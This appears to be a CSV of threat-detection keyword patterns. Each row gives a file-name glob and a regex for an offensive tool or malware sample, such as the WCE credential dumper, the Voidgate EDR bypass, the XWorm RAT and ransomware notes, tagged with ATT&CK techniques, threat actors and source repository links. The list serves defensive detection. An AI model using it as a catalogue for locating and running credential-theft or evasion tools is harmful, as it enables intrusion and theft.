"*\Venom.v1.0.2.7z*",".{0,1000}\\Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19606"
"*\Venom.v1.0.7z*",".{0,1000}\\Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19607"
"*\Venom.v1.1.0.7z*",".{0,1000}\\Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19608"
"*\venomoussway.py*",".{0,1000}\\venomoussway\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19609"
"*\vicesociety.txt*",".{0,1000}\\vicesociety\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19610"
"*\victim_info_key.py*",".{0,1000}\\victim_info_key\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","19611"
"*\Viral - Rat By Sameed.exe*",".{0,1000}\\Viral\s\-\sRat\sBy\sSameed\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19616"
"*\Virus Rat v*.exe*",".{0,1000}\\Virus\sRat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19617"
"*\Virus Rat v*.exe*",".{0,1000}\\Virus\sRat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19618"
"*\Virus1.exe*",".{0,1000}\\Virus1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19619"
"*\VNC\.VNC-Non-Auth.txt*",".{0,1000}\\VNC\\\.VNC\-Non\-Auth\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19620"
"*\vncdll.x64.dll*",".{0,1000}\\vncdll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","19621"
"*\vncdll.x86.dll*",".{0,1000}\\vncdll\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","19622"
"*\vncdump-*",".{0,1000}\\vncdump\-.{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","19623"
"*\void.log*",".{0,1000}\\void\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19627"
"*\Voidgate.cpp*",".{0,1000}\\Voidgate\.cpp.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19628"
"*\Voidgate.exe*",".{0,1000}\\Voidgate\.exe.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19629"
"*\voidgate-master\*",".{0,1000}\\voidgate\-master\\.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19630"
"*\Volumiser.exe*",".{0,1000}\\Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","19631"
"*\Volumiser.sln*",".{0,1000}\\Volumiser\.sln.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","19632"
"*\Volumiser\Program.cs*",".{0,1000}\\Volumiser\\Program\.cs.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","19633"
"*\Vsaver-Rat v*.exe*",".{0,1000}\\Vsaver\-Rat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19641"
"*\Wait_For_Command.ps1*",".{0,1000}\\Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","19645"
"*\Waitfor-Persistence.ps1*",".{0,1000}\\Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19646"
"*\Waitfor-Persistence\*",".{0,1000}\\Waitfor\-Persistence\\.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19647"
"*\Waitfor-Persistence-master*",".{0,1000}\\Waitfor\-Persistence\-master.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19648"
"*\wastedlocker.txt*",".{0,1000}\\wastedlocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19649"
"*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19650"
"*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19651"
"*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19652"
"*\wce -c *",".{0,1000}\\wce\s\-c\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19653"
"*\wce -d *",".{0,1000}\\wce\s\-d\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19654"
"*\wce -e*",".{0,1000}\\wce\s\-e.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19655"
"*\wce -l*",".{0,1000}\\wce\s\-l.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19656"
"*\wce -r*",".{0,1000}\\wce\s\-r.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19657"
"*\wce -s *",".{0,1000}\\wce\s\-s\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19658"
"*\wce.exe *",".{0,1000}\\wce\.exe\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19659"
"*\wce_ccache*",".{0,1000}\\wce_ccache.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19660"
"*\wce_krbtkts*",".{0,1000}\\wce_krbtkts.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19661"
"*\wce32.exe*",".{0,1000}\\wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","19662"
"*\wce64.exe*",".{0,1000}\\wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","19663"
"*\wce-beta.zip*",".{0,1000}\\wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","19664"
"*\wcreddump.py*",".{0,1000}\\wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","19665"
"*\WDExclusion.dll*",".{0,1000}\\WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19666"
"*\WDExclusion.pdb*",".{0,1000}\\WDExclusion\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19667"
"*\wdextract.cpp*",".{0,1000}\\wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19668"
"*\wdextract.sln*",".{0,1000}\\wdextract\.sln.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19669"
"*\wdextract.vcxproj*",".{0,1000}\\wdextract\.vcxproj.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19670"
"*\wdextract32.exe*",".{0,1000}\\wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19671"
"*\wdextract64.exe*",".{0,1000}\\wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19672"
"*\wdigest.py*",".{0,1000}\\wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19673"
"*\WdigestOffsets.csv*",".{0,1000}\\WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","19674"
"*\web_delivery.py*",".{0,1000}\\web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19675"
"*\webauthn-inject.js*",".{0,1000}\\webauthn\-inject\.js.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","19676"
"*\WebBrowserPassView.cfg*",".{0,1000}\\WebBrowserPassView\.cfg.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19677"
"*\WebBrowserPassView.chm*",".{0,1000}\\WebBrowserPassView\.chm.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19678"
"*\WebBrowserPassView_lng.ini*",".{0,1000}\\WebBrowserPassView_lng\.ini.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19679"
"*\webdav.py*",".{0,1000}\\webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19680"
"*\WeblogicRCE.exe*",".{0,1000}\\WeblogicRCE\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19681"
"*\webpassview.exe*",".{0,1000}\\webpassview\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19682"
